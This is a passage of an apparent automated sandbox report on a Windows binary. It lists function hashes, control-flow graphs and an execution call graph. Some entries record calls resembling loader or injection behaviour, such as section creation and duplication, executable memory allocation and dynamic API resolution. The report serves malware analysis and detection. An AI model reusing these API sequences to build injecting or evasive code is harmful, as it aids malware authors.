                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da38201a32f90b98934b488a65b371e434f1df0c2a04d29242935d2455de016b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A901A1B120C204EBDB009A95DD62E7A3364AB40314F30453BBA437A1F1C67D9913E72B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 486 40195c-4019ae call 4011cd Sleep call 401452 498 4019b0-4019b8 call 401553 486->498 499 4019bd-401a03 call 4011cd 486->499 498->499
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2410106384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5e3dbe5dd20a4fb5b92f76c9b13fda5f390ba4e8200e1751a23b03b4d52e4fb4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3b2e7dc224df146109f963d95c0ead7a9e1b698bafe8296883a7ac19869aede1
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e3dbe5dd20a4fb5b92f76c9b13fda5f390ba4e8200e1751a23b03b4d52e4fb4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA0171B5208204EADB006AD5DD71E7A3269AB44314F304537BA43791F1D57D8912F72B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 513 401973-4019ae call 4011cd Sleep call 401452 524 4019b0-4019b8 call 401553 513->524 525 4019bd-401a03 call 4011cd 513->525 524->525
APIs
• Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
  • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
  • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
Memory Dump Source
• Source File: 00000006.00000002.2410106384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_rghwvve.jbxd
Similarity
• API ID: CreateDuplicateObjectSectionSleep
• String ID:
• API String ID: 4152845823-0
• Opcode ID: acb1fae293eb73a10805bbdd55e216ebbc49928181db8483aeacc3243d44ee5b
• Instruction ID: 4b03b50232763afd30ab0c608f125a1a80ed78bb00471cf4ed55e3bed959d7b6
• Opcode Fuzzy Hash: acb1fae293eb73a10805bbdd55e216ebbc49928181db8483aeacc3243d44ee5b
• Instruction Fuzzy Hash: F80184B5208204EBDB006AD5DD71EBA3269AB44354F304537BA43790F1C57D8912F72B
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 539 401964-4019ae call 4011cd Sleep call 401452 549 4019b0-4019b8 call 401553 539->549 550 4019bd-401a03 call 4011cd 539->550 549->550
APIs
• Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
  • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
  • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
Memory Dump Source
• Source File: 00000006.00000002.2410106384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_rghwvve.jbxd
Similarity
• API ID: CreateDuplicateObjectSectionSleep
• String ID:
• API String ID: 4152845823-0
• Opcode ID: e5353c19dd0b10c2d892503bd00f36fba5e3f507ee708bcba0cfbdc82fbef293
• Instruction ID: f592bab324d3cd5d6286c78059ef0a1e8702b22de7bd53a4ec4d5e19e7ef6e8c
• Opcode Fuzzy Hash: e5353c19dd0b10c2d892503bd00f36fba5e3f507ee708bcba0cfbdc82fbef293
• Instruction Fuzzy Hash: 0D0184B5208204EBDB006AC5DD62EBA3265AB44314F204537FA43791F1C57D8912F72B
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005EEE28
Memory Dump Source
• Source File: 00000006.00000002.2412727821.00000000005E8000.00000040.00000020.00020000.00000000.sdmp, Offset: 005E8000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5e8000_rghwvve.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction ID: 3cd5bd5864ef84ea352ea746d0d700af5cdc717c28de67275389377c2ee8f138
• Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction Fuzzy Hash: A6112D79A00208EFDB01DF99C985E99BFF5AF08750F058094F9889B362D771EA50DB80
Uniqueness

Uniqueness Score: -1.00%

APIs
• Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
  • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
  • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
Memory Dump Source
• Source File: 00000006.00000002.2410106384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_rghwvve.jbxd
Similarity
• API ID: CreateDuplicateObjectSectionSleep
• String ID:
• API String ID: 4152845823-0
• Opcode ID: 74fb996ba95ec06bb2abe22af5600ab9efc13f551b73dbf86f34961914988ff4
• Instruction ID: 68c2b1bb8267a16b47d2b790190fa602822f098e0b694be4ddc2e306b3be1968
• Opcode Fuzzy Hash: 74fb996ba95ec06bb2abe22af5600ab9efc13f551b73dbf86f34961914988ff4
• Instruction Fuzzy Hash: 2AF086B5208204FADB006BD59D61EBA3768AB44354F204137BA13790F1C57D8912F72B
Uniqueness

Uniqueness Score: -1.00%

APIs
• Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
  • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
  • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
Memory Dump Source
• Source File: 00000006.00000002.2410106384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_rghwvve.jbxd
Similarity
• API ID: CreateDuplicateObjectSectionSleep
• String ID:
• API String ID: 4152845823-0
• Opcode ID: f19d6598d7b3f8bbc47500c90c3d0bc6a0ede41a7b6f28d3ccddc132527cc834
• Instruction ID: 49220a4dcaca44086484813bdb512237367292e15b320859d1a96440f4f24ef4
• Opcode Fuzzy Hash: f19d6598d7b3f8bbc47500c90c3d0bc6a0ede41a7b6f28d3ccddc132527cc834
• Instruction Fuzzy Hash: 7801A7B1208244FBDB016BD19D62EB93768AB05354F204537FA53790F2C67D8912E72B
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 4.7%
Dynamic/Decrypted Code Coverage: 3.2%
Signature Coverage: 5.9%
Total number of Nodes: 1191
Total number of Limit Nodes: 27
calls 11894->11897 11898 405342 _free 66 API calls 11895->11898 11895->11899 11896->11894 11897->11895 11898->11899 11899->11839 11901 40aa54 11900->11901 12073 405fb3 11900->12073 11902 405342 _free 66 API calls 11901->11902 11903 40aa5c 11902->11903 11904 405342 _free 66 API calls 11903->11904 11905 40aa64 11904->11905 11906 405342 _free 66 API calls 11905->11906 11907 40aa6c 11906->11907 11908 405342 _free 66 API calls 11907->11908 11909 40aa74 11908->11909 11910 405342 _free 66 API calls 11909->11910 11911 40aa7c 11910->11911 11912 405342 _free 66 API calls 11911->11912 11913 40aa84 11912->11913 11914 405342 _free 66 API calls 11913->11914 11915 40aa8b 11914->11915 11916 405342 _free 66 API calls 11915->11916 11917 40aa93 11916->11917 11918 405342 _free 66 API calls 11917->11918 11919 40aa9b 11918->11919 11920 405342 _free 66 API calls 11919->11920 11921 40aaa3 11920->11921 11922 405342 _free 66 API calls 11921->11922 11923 40aaab 11922->11923 11924 405342 _free 66 API calls 11923->11924 11925 40aab3 11924->11925 11926 405342 _free 66 API calls 11925->11926 11927 40aabb 11926->11927 11928 405342 _free 66 API calls 11927->11928 11929 40aac3 11928->11929 11930 405342 _free 66 API calls 11929->11930 11931 40aacb 11930->11931 11932 405342 _free 66 API calls 11931->11932 11933 40aad3 11932->11933 11934 405342 _free 66 API calls 11933->11934 11935 40aade 11934->11935 11936 405342 _free 66 API calls 11935->11936 11937 40aae6 11936->11937 11938 405342 _free 66 API calls 11937->11938 11939 40aaee 11938->11939 11940 405342 _free 66 API calls 11939->11940 11941 40aaf6 11940->11941 11942 405342 _free 66 API calls 11941->11942 11943 40aafe 11942->11943 11944 405342 _free 66 API calls 11943->11944 11945 40ab06 11944->11945 11946 405342 _free 66 API calls 11945->11946 11947 40ab0e 11946->11947 11948 405342 _free 66 API calls 11947->11948 11949 40ab16 11948->11949 11950 405342 _free 66 API calls 11949->11950 11951 40ab1e 11950->11951 11952 405342 _free 66 API calls 
11951->11952 11953 40ab26 11952->11953 11954 405342 _free 66 API calls 11953->11954 11955 40ab2e 11954->11955 11956 405342 _free 66 API calls 11955->11956 11957 40ab36 11956->11957 11958 405342 _free 66 API calls 11957->11958 11959 40ab3e 11958->11959 11960 405342 _free 66 API calls 11959->11960 11961 40ab46 11960->11961 11962 405342 _free 66 API calls 11961->11962 11963 40ab4e 11962->11963 11964 405342 _free 66 API calls 11963->11964 11965 40ab56 11964->11965 11966 405342 _free 66 API calls 11965->11966 11967 40ab64 11966->11967 11968 405342 _free 66 API calls 11967->11968 11969 40ab6f 11968->11969 11970 405342 _free 66 API calls 11969->11970 11971 40ab7a 11970->11971 11972 405342 _free 66 API calls 11971->11972 11973 40ab85 11972->11973 11974 405342 _free 66 API calls 11973->11974 11975 40ab90 11974->11975 11976 405342 _free 66 API calls 11975->11976 11977 40ab9b 11976->11977 11978 405342 _free 66 API calls 11977->11978 11979 40aba6 11978->11979 11980 405342 _free 66 API calls 11979->11980 11981 40abb1 11980->11981 11982 405342 _free 66 API calls 11981->11982 11983 40abbc 11982->11983 11984 405342 _free 66 API calls 11983->11984 11985 40abc7 11984->11985 11986 405342 _free 66 API calls 11985->11986 11987 40abd2 11986->11987 11988 405342 _free 66 API calls 11987->11988 11989 40abdd 11988->11989 11990 405342 _free 66 API calls 11989->11990 11991 40abe8 11990->11991 11992 405342 _free 66 API calls 11991->11992 11993 40abf3 11992->11993 11994 405342 _free 66 API calls 11993->11994 11995 40abfe 11994->11995 11996 405342 _free 66 API calls 11995->11996 11997 40ac09 11996->11997 11998 405342 _free 66 API calls 11997->11998 11999 40ac17 11998->11999 12000 405342 _free 66 API calls 11999->12000 12001 40ac22 12000->12001 12002 405342 _free 66 API calls 12001->12002 12003 40ac2d 12002->12003 12004 405342 _free 66 API calls 12003->12004 12005 40ac38 12004->12005 12006 405342 _free 66 API calls 12005->12006 12007 40ac43 12006->12007 12008 405342 _free 66 API calls 
12007->12008 12009 40ac4e 12008->12009 12010 405342 _free 66 API calls 12009->12010 12011 40ac59 12010->12011 12012 405342 _free 66 API calls 12011->12012 12013 40ac64 12012->12013 12014 405342 _free 66 API calls 12013->12014 12015 40ac6f 12014->12015 12016 405342 _free 66 API calls 12015->12016 12017 40ac7a 12016->12017 12018 405342 _free 66 API calls 12017->12018 12019 40ac85 12018->12019 12020 405342 _free 66 API calls 12019->12020 12021 40ac90 12020->12021 12022 405342 _free 66 API calls 12021->12022 12023 40ac9b 12022->12023 12024 405342 _free 66 API calls 12023->12024 12025 40aca6 12024->12025 12026 405342 _free 66 API calls 12025->12026 12027 40acb1 12026->12027 12028 405342 _free 66 API calls 12027->12028 12029 40acbc 12028->12029 12030 405342 _free 66 API calls 12029->12030 12031 40acca 12030->12031 12032 405342 _free 66 API calls 12031->12032 12033 40acd5 12032->12033 12034 405342 _free 66 API calls 12033->12034 12035 40ace0 12034->12035 12036 405342 _free 66 API calls 12035->12036 12037 40aceb 12036->12037 12038 405342 _free 66 API calls 12037->12038 12039 40acf6 12038->12039 12040 405342 _free 66 API calls 12039->12040 12041 40ad01 12040->12041 12042 405342 _free 66 API calls 12041->12042 12043 40ad0c 12042->12043 12044 405342 _free 66 API calls 12043->12044 12045 40ad17 12044->12045 12046 405342 _free 66 API calls 12045->12046 12047 40ad22 12046->12047 12048 405342 _free 66 API calls 12047->12048 12049 40ad2d 12048->12049 12050 405342 _free 66 API calls 12049->12050 12051 40ad38 12050->12051 12052 405342 _free 66 API calls 12051->12052 12053 40ad43 12052->12053 12054 405342 _free 66 API calls 12053->12054 12055 40ad4e 12054->12055 12056 405342 _free 66 API calls 12055->12056 12057 40ad59 12056->12057 12058 405342 _free 66 API calls 12057->12058 12059 40ad64 12058->12059 12060 405342 _free 66 API calls 12059->12060 12061 40ad6f 12060->12061 12062 405342 _free 66 API calls 12061->12062 12063 40ad7d 12062->12063 12064 405342 _free 66 API calls 
12063->12064 12065 40ad88 12064->12065 12066 405342 _free 66 API calls 12065->12066 12067 40ad93 12066->12067 12068 405342 _free 66 API calls 12067->12068 12069 40ad9e 12068->12069 12070 405342 _free 66 API calls 12069->12070 12071 40ada9 12070->12071 12072 405342 _free 66 API calls 12071->12072 12072->12073 12073->11844 12074->11815 12076 4057f5 12075->12076 12078 405741 _memset 12075->12078 12081 401114 setSBUpLow 5 API calls 12076->12081 12085 40a204 12078->12085 12083 40589b 12081->12083 12083->11774 12084 40a0d7 ___crtLCMapStringA 82 API calls 12084->12076 12086 402284 _LocaleUpdate::_LocaleUpdate 76 API calls 12085->12086 12087 40a217 12086->12087 12095 40a11d 12087->12095 12090 40a0d7 12091 402284 _LocaleUpdate::_LocaleUpdate 76 API calls 12090->12091 12092 40a0ea 12091->12092 12112 409ef0 12092->12112 12096 40a146 MultiByteToWideChar 12095->12096 12097 40a13b 12095->12097 12098 40a16f 12096->12098 12101 40a173 12096->12101 12097->12096 12099 401114 setSBUpLow 5 API calls 12098->12099 12100 4057b0 12099->12100 12100->12090 12102 40a188 _memset __crtLCMapStringA_stat 12101->12102 12103 4044b9 _malloc 66 API calls 12101->12103 12102->12098 12104 40a1c1 MultiByteToWideChar 12102->12104 12103->12102 12105 40a1d7 GetStringTypeW 12104->12105 12106 40a1e8 12104->12106 12105->12106 12108 4092cc 12106->12108 12109 4092d8 12108->12109 12110 4092e9 12108->12110 12109->12110 12111 405342 _free 66 API calls 12109->12111 12110->12098 12111->12110 12113 409f0e MultiByteToWideChar 12112->12113 12115 409f6c 12113->12115 12118 409f73 12113->12118 12116 401114 setSBUpLow 5 API calls 12115->12116 12117 4057d0 12116->12117 12117->12084 12122 4044b9 _malloc 66 API calls 12118->12122 12126 409f8c __crtLCMapStringA_stat 12118->12126 12119 409fc0 MultiByteToWideChar 12120 40a0b8 12119->12120 12121 409fd9 LCMapStringW 12119->12121 12124 4092cc __freea 66 API calls 12120->12124 12121->12120 12123 409ff8 12121->12123 12122->12126 12125 40a002 12123->12125 12129 40a02b 12123->12129 
12124->12115 12125->12120 12127 40a016 LCMapStringW 12125->12127 12126->12115 12126->12119 12127->12120 12128 40a07a LCMapStringW 12130 40a090 WideCharToMultiByte 12128->12130 12131 40a0b2 12128->12131 12132 40a046 __crtLCMapStringA_stat 12129->12132 12133 4044b9 _malloc 66 API calls 12129->12133 12130->12131 12134 4092cc __freea 66 API calls 12131->12134 12132->12120 12132->12128 12133->12132 12134->12120 12136->11777 12140 403121 DecodePointer 12137->12140 12141 403136 12140->12141 12142 4030e2 __invoke_watson 10 API calls 12141->12142 12143 40314d 12142->12143 12144 403121 __invalid_parameter_noinfo_noreturn 10 API calls 12143->12144 12145 40315a 12144->12145 12145->11704 12147 405075 EncodePointer 12146->12147 12147->12147 12148 40508f 12147->12148 12148->11391 12152 40124a 12149->12152 12151 401293 12151->11393 12153 401256 _raise 12152->12153 12160 401ab7 12153->12160 12159 401277 _raise 12159->12151 12161 4047fa __lock 66 API calls 12160->12161 12162 40125b 12161->12162 12163 401163 DecodePointer DecodePointer 12162->12163 12164 401191 12163->12164 12165 401212 12163->12165 12164->12165 12177 401a41 12164->12177 12174 401280 12165->12174 12167 4011f5 EncodePointer EncodePointer 12167->12165 12168 4011c7 12168->12165 12171 4019a1 __realloc_crt 70 API calls 12168->12171 12172 4011e3 EncodePointer 12168->12172 12169 4011a3 12169->12167 12169->12168 12184 4019a1 12169->12184 12173 4011dd 12171->12173 12172->12167 12173->12165 12173->12172 12210 401ac0 12174->12210 12178 401a61 HeapSize 12177->12178 12179 401a4c 12177->12179 12178->12169 12180 40177e __configthreadlocale 66 API calls 12179->12180 12181 401a51 12180->12181 12182 40314e __configthreadlocale 11 API calls 12181->12182 12183 401a5c 12182->12183 12183->12169 12188 4019aa 12184->12188 12186 4019e9 12186->12168 12187 4019ca Sleep 12187->12188 12188->12186 12188->12187 12189 40454d 12188->12189 12190 404563 12189->12190 12191 404558 12189->12191 12193 40456b 12190->12193 12201 404578 12190->12201 12192 
4044b9 _malloc 66 API calls 12191->12192 12194 404560 12192->12194 12195 405342 _free 66 API calls 12193->12195 12194->12188 12209 404573 _rand_s 12195->12209 12196 4045b0 12197 404452 _malloc DecodePointer 12196->12197 12199 4045b6 12197->12199 12198 404580 HeapReAlloc 12198->12201 12198->12209 12202 40177e __configthreadlocale 66 API calls 12199->12202 12200 4045e0 12204 40177e __configthreadlocale 66 API calls 12200->12204 12201->12196 12201->12198 12201->12200 12203 404452 _malloc DecodePointer 12201->12203 12206 4045c8 12201->12206 12202->12209 12203->12201 12205 4045e5 GetLastError 12204->12205 12205->12209 12207 40177e __configthreadlocale 66 API calls 12206->12207 12208 4045cd GetLastError 12207->12208 12208->12209 12209->12188 12213 404709 LeaveCriticalSection 12210->12213 12212 401285 12212->12159 12213->12212 12217 408b24 12214->12217 12218 402284 _LocaleUpdate::_LocaleUpdate 76 API calls 12217->12218 12219 408b37 12218->12219 12219->11398 12221 5cbb0d __write_nolock 12220->12221 12222 5cbb32 GetTickCount SetLastError GetConsoleAliasesW 12221->12222 12228 5cbb6c 12221->12228 12223 5cbb20 12222->12223 12224 5cbb55 12222->12224 12223->12221 12225 5cbb5e CreateDirectoryW 12224->12225 12226 5cbb68 12224->12226 12225->12226 12226->12228 12227 5cbbaf 12229 5cbbbc InterlockedIncrement DestroyIcon 12227->12229 12230 5cbc58 12227->12230 12228->12227 12231 5cbba5 ResetEvent 12228->12231 12266 4066f0 12229->12266 12233 5cbc8d OpenJobObjectA 12230->12233 12234 5cbca3 10 API calls 12230->12234 12262 5cbe19 12230->12262 12231->12228 12233->12234 12271 40129d 12234->12271 12238 5cbe21 12264 5cb920 LoadLibraryA 12238->12264 12239 5cbc28 GetStartupInfoW 12240 5cbc30 12239->12240 12241 5cbc4d 12240->12241 12242 5cbc39 GetModuleHandleExA 12240->12242 12268 401010 12241->12268 12242->12241 12243 5cbda7 12288 401123 12243->12288 12248 5cbe83 12265 5cb070 LoadLibraryW GetProcAddress VirtualProtect 12248->12265 12249 401123 _calloc 66 API calls 12251 5cbdbf _memset 
12249->12251 12254 401123 _calloc 66 API calls 12251->12254 12252 5cbe88 12302 5cba50 12252->12302 12255 5cbdf9 12254->12255 12259 401286 __cinit 76 API calls 12255->12259 12256 5cbef1 12256->12256 12257 5cbec5 SetProcessWorkingSetSize 12258 5cbe92 12257->12258 12258->12256 12258->12257 12260 5cbe0f 12259->12260 12295 401427 12260->12295 12263 5cb040 LocalAlloc 12262->12263 12263->12238 12264->12248 12265->12252 12267 4066fc SetDefaultCommConfigW FreeEnvironmentStringsW GetCurrentDirectoryA EnumDateFormatsExA 12266->12267 12267->12239 12267->12240 12311 5cc0f0 12268->12311 12270 40101f 12270->12230 12272 4012a9 _raise 12271->12272 12273 4012b7 12272->12273 12274 4012cc __flsbuf 12272->12274 12275 40177e __configthreadlocale 66 API calls 12273->12275 12367 402117 12274->12367 12276 4012bc 12275->12276 12278 40314e __configthreadlocale 11 API calls 12276->12278 12280 4012c7 _raise 12278->12280 12279 4012de __flsbuf 12372 4021b4 12279->12372 12280->12243 12282 4012f0 __flsbuf 12379 4023ca 12282->12379 12284 401308 __flsbuf 12400 402250 12284->12400 12289 401853 __calloc_crt 66 API calls 12288->12289 12290 40113d 12289->12290 12291 401159 12290->12291 12292 40177e __configthreadlocale 66 API calls 12290->12292 12291->12249 12293 401150 12292->12293 12293->12291 12294 40177e __configthreadlocale 66 API calls 12293->12294 12294->12291 12296 401433 12295->12296 12297 401447 12295->12297 12298 40177e __configthreadlocale 66 API calls 12296->12298 12297->12262 12299 401438 12298->12299 12300 40314e __configthreadlocale 11 API calls 12299->12300 12301 401443 12300->12301 12301->12262 12575 5cb990 12302->12575 12305 5cba89 FreeEnvironmentStringsW ReadEventLogA CreateNamedPipeA FileTimeToLocalFileTime 12306 5cbae4 12305->12306 12578 5cb9c0 12306->12578 12309 401114 setSBUpLow 5 API calls 12310 5cbaf9 12309->12310 12310->12258 12312 5cc0fd 12311->12312 12315 5cd091 __ctrlfp __floor_pentium4 12311->12315 12313 5cc12e 12312->12313 12312->12315 12319 5cc178 12313->12319 12322 
5ccd9c 12313->12322 12314 5cd0ff __floor_pentium4 12321 5cd0ec __ctrlfp 12314->12321 12337 5ce7f1 12314->12337 12315->12314 12317 5cd0dc 12315->12317 12315->12321 12330 5ce73b 12317->12330 12319->12270 12321->12270 12323 5ccdb4 DecodePointer 12322->12323 12325 5ccdc2 12322->12325 12323->12325 12324 5cce5e 12324->12319 12325->12324 12326 5cceab 12325->12326 12327 5cce0f 12325->12327 12326->12324 12328 40177e __configthreadlocale 66 API calls 12326->12328 12327->12324 12329 40177e __configthreadlocale 66 API calls 12327->12329 12328->12324 12329->12324 12331 5ce749 12330->12331 12332 5ce771 12330->12332 12348 5ce69b 12331->12348 12334 40177e __configthreadlocale 66 API calls 12332->12334 12336 5ce776 __ctrlfp 12334->12336 12335 5ce76c 12335->12321 12336->12321 12338 5ce827 __handle_exc 12337->12338 12340 5ce84e __except1 12338->12340 12363 5ce10e 12338->12363 12341 5ce890 12340->12341 12343 5ce869 12340->12343 12342 5ce614 __except1 66 API calls 12341->12342 12345 5ce88b __ctrlfp 12342->12345 12344 5ce69b __umatherr 66 API calls 12343->12344 12344->12345 12346 401114 setSBUpLow 5 API calls 12345->12346 12347 5ce8b4 12346->12347 12347->12321 12349 5ce6a5 12348->12349 12350 5ce71e __ctrlfp 12349->12350 12351 5ce6c0 __umatherr __ctrlfp 12349->12351 12352 5ce614 __except1 66 API calls 12350->12352 12354 5ce70e 12351->12354 12356 5ce614 12351->12356 12353 5ce733 12352->12353 12353->12335 12354->12335 12357 5ce61f 12356->12357 12358 5ce634 12356->12358 12360 5ce639 12357->12360 12361 40177e __configthreadlocale 66 API calls 12357->12361 12359 40177e __configthreadlocale 66 API calls 12358->12359 12359->12360 12360->12354 12362 5ce62c 12361->12362 12362->12354 12364 5ce135 __raise_exc_ex 12363->12364 12365 5ce328 RaiseException 12364->12365 12366 5ce341 12365->12366 12366->12340 12368 402124 12367->12368 12369 40213a EnterCriticalSection 12367->12369 12370 4047fa __lock 66 API calls 12368->12370 12369->12279 12371 40212d 12370->12371 12371->12279 12408 405654 12372->12408 
12374 4021c3 12415 4055fe 12374->12415 12376 402216 12376->12282 12377 4021c9 __flsbuf 12377->12376 12378 401910 __malloc_crt 66 API calls 12377->12378 12378->12376 12380 402284 _LocaleUpdate::_LocaleUpdate 76 API calls 12379->12380 12381 402431 12380->12381 12382 402435 12381->12382 12384 405654 __flsbuf 66 API calls 12381->12384 12396 40246c __output_l __aulldvrm _strlen 12381->12396 12383 40177e __configthreadlocale 66 API calls 12382->12383 12385 40243a 12383->12385 12384->12396 12386 40314e __configthreadlocale 11 API calls 12385->12386 12387 402445 12386->12387 12388 401114 setSBUpLow 5 API calls 12387->12388 12389 402f51 12388->12389 12389->12284 12391 405342 _free 66 API calls 12391->12396 12392 402ac1 DecodePointer 12392->12396 12393 406420 78 API calls __cftof 12393->12396 12394 401910 __malloc_crt 66 API calls 12394->12396 12395 402b2a DecodePointer 12395->12396 12396->12382 12396->12387 12396->12391 12396->12392 12396->12393 12396->12394 12396->12395 12397 402b4b DecodePointer 12396->12397 12398 40231c 97 API calls _write_string 12396->12398 12399 40676a 97 API calls __output_l 12396->12399 12424 4064c0 12396->12424 12397->12396 12398->12396 12399->12396 12401 40225b 12400->12401 12403 401319 12400->12403 12401->12403 12427 405418 12401->12427 12404 401331 12403->12404 12405 401336 __flsbuf 12404->12405 12569 402185 12405->12569 12407 401341 12407->12280 12409 405660 12408->12409 12410 405675 12408->12410 12411 40177e __configthreadlocale 66 API calls 12409->12411 12410->12374 12412 405665 12411->12412 12413 40314e __configthreadlocale 11 API calls 12412->12413 12414 405670 12413->12414 12414->12374 12416 40561a 12415->12416 12417 40560b 12415->12417 12419 405638 12416->12419 12420 40177e __configthreadlocale 66 API calls 12416->12420 12418 40177e __configthreadlocale 66 API calls 12417->12418 12423 405610 12418->12423 12419->12377 12421 40562b 12420->12421 12422 40314e __configthreadlocale 11 API calls 12421->12422 12422->12423 12423->12377 12425 
402284 _LocaleUpdate::_LocaleUpdate 76 API calls 12424->12425 12426 4064d3 12425->12426 12426->12396 12428 405453 12427->12428 12429 405431 12427->12429 12428->12403 12429->12428 12430 405654 __flsbuf 66 API calls 12429->12430 12431 40544c 12430->12431 12433 409d25 12431->12433 12434 409d31 _raise 12433->12434 12435 409d54 12434->12435 12436 409d39 12434->12436 12438 409d60 12435->12438 12442 409d9a 12435->12442 12458 401791 12436->12458 12439 401791 __close 66 API calls 12438->12439 12441 409d65 12439->12441 12444 40177e __configthreadlocale 66 API calls 12441->12444 12461 40c5ab 12442->12461 12443 40177e __configthreadlocale 66 API calls 12451 409d46 _raise 12443->12451 12446 409d6d 12444->12446 12448 40314e __configthreadlocale 11 API calls 12446->12448 12447 409da0 12449 409dc2 12447->12449 12450 409dae 12447->12450 12448->12451 12453 40177e __configthreadlocale 66 API calls 12449->12453 12471 409628 12450->12471 12451->12428 12454 409dc7 12453->12454 12456 401791 __close 66 API calls 12454->12456 12455 409dba 12530 409df1 12455->12530 12456->12455 12459 403f64 __getptd_noexit 66 API calls 12458->12459 12460 401796 12459->12460 12460->12443 12462 40c5b7 _raise 12461->12462 12463 40c611 12462->12463 12465 4047fa __lock 66 API calls 12462->12465 12464 40c616 EnterCriticalSection 12463->12464 12466 40c633 _raise 12463->12466 12464->12466 12467 40c5e3 12465->12467 12466->12447 12468 40c5ff 12467->12468 12469 40c5ec InitializeCriticalSectionAndSpinCount 12467->12469 12533 40c641 12468->12533 12469->12468 12472 409637 __write_nolock 12471->12472 12473 40968c 12472->12473 12474 40966d 12472->12474 12504 409662 12472->12504 12479 4096e8 12473->12479 12480 4096cb 12473->12480 12476 401791 __close 66 API calls 12474->12476 12475 401114 setSBUpLow 5 API calls 12478 409d23 12475->12478 12477 409672 12476->12477 12482 40177e __configthreadlocale 66 API calls 12477->12482 12478->12455 12481 4096fb 12479->12481 12537 40b573 12479->12537 12483 401791 __close 66 API calls 
